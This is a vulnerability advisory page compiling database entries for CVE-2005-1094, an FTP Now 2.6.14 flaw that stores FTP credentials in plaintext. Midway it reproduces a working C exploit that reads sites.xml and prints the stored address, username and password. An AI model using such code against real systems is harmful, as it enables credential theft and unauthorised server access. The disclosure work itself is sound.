CVE-2005-1094
CVSS 4.6
Published: 2005-04-08 00:00:00
Last revised: 2008-09-05 16:48:11

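[Original] FTP Now 2.6.14 stores usernames and passwords in plaintext in sites.xml, which is world-readable, which allows local users to gain privileges.


[CNNVD] Network-Client FTP Now Local Password Disclosure Vulnerability (CNNVD-200504-009)

        FTP Now is a simple, easy-to-understand FTP client. Although it does not offer powerful features, it is a rare entry-level tool for users who are new to networking. Unlike other FTP software, which focuses on powerful functionality, FTP Now mainly emphasizes ease of operation.
        FTP Now 2.6.14 stores usernames and passwords in plaintext in sites.xml, which is world-readable, allowing local users to gain privileges.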

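- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definition found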

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1094
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1094
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200504-009
(Official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/20025
(VENDOR_ADVISORY)  XF  ftpnow-sites-information-disclosure(20025)
http://securitytracker.com/id?1013657
(VENDOR_ADVISORY)  SECTRACK  1013657
http://secunia.com/advisories/14889
(VENDOR_ADVISORY)  SECUNIA  14889
http://www.osvdb.org/15296
(UNKNOWN)  OSVDB  15296

- Vulnerability information

Network-Client FTP Now Local Password Disclosure Vulnerability
Medium severity  Design error
2005-04-08 00:00:00 2005-10-20 00:00:00
Local

- Advisories and patches

        No data available

- Vulnerability information (918)

FTP Now <= 2.6.14 Local Password Disclosure Exploit (EDBID:918)
windows local
2005-04-06 Verified
0 Kozan
N/A
/*******************************************************************

FTP Now v2.6.14 Local Password Disclosure Exploit by Kozan

Application: FTP Now v2.6.14 (and prior versions)
Vendor:www.network-client.com
Vulnerable Description: FTP Now v2.6.14 discloses passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web: www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*******************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

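/* Returns the file offset at which Str is found, or -1 if it is not found. */
int adresal(char *FilePath,char *Str)
{
       char kr;
       int Sayac=0;
       int Offset=-1;
       FILE *di;
       di=fopen(FilePath,"rb");

       if( di == NULL )
       {
               /* nothing to close: fopen failed */
               return -1;
       }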

       while(!feof(di))
       {
               Sayac++;
               for(int i=0;i<strlen(Str);i++)
               {
                       kr=getc(di);
                       if(kr != Str[i])
                       {
                               if( i>0 )
                               {
                                       fseek(di,Sayac+1,SEEK_SET);
                               }
                               break;
                       }
                       if( i > ( strlen(Str)-2 ) )
                       {
                               Offset = ftell(di)-strlen(Str);
                               fclose(di);
                               return Offset;
                       }
               }
       }
       fclose(di);
       return -1;
}

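/* Returns the text between the tag Str and the next '<' in the file, or "" if the tag is absent. */
char *oku(char *FilePath,char *Str)
{

       FILE *di;
       int cr;
       int i=0;
       /* static so the returned pointer stays valid after the function returns */
       static char Feature[500];

       int Offset = adresal(FilePath,Str);

       if( Offset == -1 )
               return "";

       if( (di=fopen(FilePath,"rb")) == NULL )
               return "";

       fseek(di,Offset+strlen(Str),SEEK_SET);

       /* stop at end of file, at the next tag, or when the buffer is full */
       while( i < (int)sizeof(Feature)-1 )
       {
               cr=getc(di);
               if(cr == EOF || cr == '<')
                       break;
               Feature[i] = (char)cr;
               i++;
       }

       Feature[i] = '\0';
       fclose(di);
       return Feature;
}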

int main()
{
       if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                   "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                   0,
                   KEY_QUERY_VALUE,
                   &hKey) == ERROR_SUCCESS)
       {
               lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
                                       (LPBYTE) prgfiles, &dwBufLen);

               if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
               {
                       RegCloseKey(hKey);
                       printf("An error occurred!\n");
                       exit(1);
               }

               RegCloseKey(hKey);
       }
       else
       {
               /* the key was never opened, so there is no handle to close */
               printf("An error occurred!\n");
               exit(1);
       }

       strcat(prgfiles,"\\FTP Now\\sites.xml");

       printf("FTP Now <= v2.6.14 Local Exploit by Kozan\n");
       printf("Credits to ATmaCA\n");
       printf("www.netmagister.com  -  www.spyinstructors.com \n\n");
       printf("This exploit only show the first profile and its password.\n");
       printf("You may improve it freely...\n\n");

       /* sized to match the 500-byte buffer that oku() returns */
       char FtpAddress[500], FtpUsername[500], FtpPassword[500];

       strcpy(FtpAddress,oku(prgfiles,"<ADDRESS>"));
       strcpy(FtpUsername,oku(prgfiles,"<LOGIN>"));
       strcpy(FtpPassword,oku(prgfiles,"<PASSWORD>"));

       printf("Ftp Address   : %s\n",FtpAddress);
       printf("Ftp Username  : %s\n",FtpUsername);
       printf("Ftp Password  : %s\n",FtpPassword);

       return 0;
}

// milw0rm.com [2005-04-06]
		

- Vulnerability information

15296
FTP Now sites.xml Local Password Disclosure
Local Access Required Information Disclosure
Loss of Confidentiality
Exploit Public

- Vulnerability description

FTP Now contains a flaw that may lead to an unauthorized information disclosure. The issue is due to plaintext storage of sensitive information in the "Program Files\FTP Now\sites.xml" configuration file, which will disclose the account name and password to local users resulting in a loss of confidentiality.

- Timeline

2005-04-07 Unknown
2005-04-07 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Vulnerability author

- Vulnerability information

Network-Client FTP Now Local Password Disclosure Vulnerability
Design Error 13052
No Yes
2005-04-07 12:00:00 2009-07-12 12:56:00
Discovery is credited to Kozan <kozan@netmagister.com>.

- Affected versions

Network-Client FTP Now 2.6.14

- Discussion

FTP Now is reported prone to a vulnerability that can allow an attacker to disclose FTP passwords.

A local attacker can gain access to a file, which contains the credentials in plain text format.

The attacker may then use these credentials to access remote FTP servers and carry out other attacks.

FTP Now 2.6.14 is reported prone; however, it is possible that other versions are affected as well.

- Exploit

An exploit is not required.

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- References
